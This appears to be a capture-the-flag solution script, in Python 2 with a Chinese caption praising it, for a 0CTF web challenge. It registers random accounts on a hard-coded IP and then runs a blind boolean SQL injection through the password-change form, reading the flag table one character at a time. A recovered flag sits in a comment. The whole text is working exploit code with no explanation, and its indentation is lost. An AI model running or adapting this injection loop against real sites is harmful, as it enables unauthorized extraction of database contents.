非常不错的爆破脚本
import requests, random, string
# password='=(select CASE WHEN length(flag)=26 THEN 1 ELSE 1 MATCH '(' END from flag)='
# password='=(select CASE WHEN substr(flag, 1, 1)='1' THEN 1 ELSE 1 MATCH '(' END from flag)='
# charset = string.digits + "_" + string.letters + "{}"
#0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
# charset = [chr(i) for i in range(256)]
charset = string.printable
#SELECT CASE 3 WHEN 1 THEN 'one' WHEN 2 THEN 'two' ELSE 'more' END;
sql_template = "'=(select CASE WHEN substr(flag, %d, 1)='%s' THEN 1 ELSE (1 match 1) END from flag)='"
s = requests.Session()
#finally we get the flag = '0CTF{R0t_?_S8rRy_1_doNt_N}'
flag=''
while 1:
# gen creds
creds = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(10))
data = {'username': creds,'password':creds, 'email':creds}
# register
r = s.post("http://202.112.28.113:5000/register", data=data)
if r.text.find("Now You can log in:") == -1:
continue
# login
r = s.post("http://202.112.28.113:5000/login", data=data)
if r.text.find("Modify password") == -1:
continue
# inject
i = len(flag) + 1
print i,
for c in charset:
if c == '-' or c == '/':
# blacklisted shit !
continue
data['password'] = sql_template % (i, c)
r = s.post("http://202.112.28.113:5000/modify", data=data)
if r.text.find("HAHAHA,YOUR PASSWORD HAS BEEN UPDATED") != -1:
flag += c
print repr(flag)
break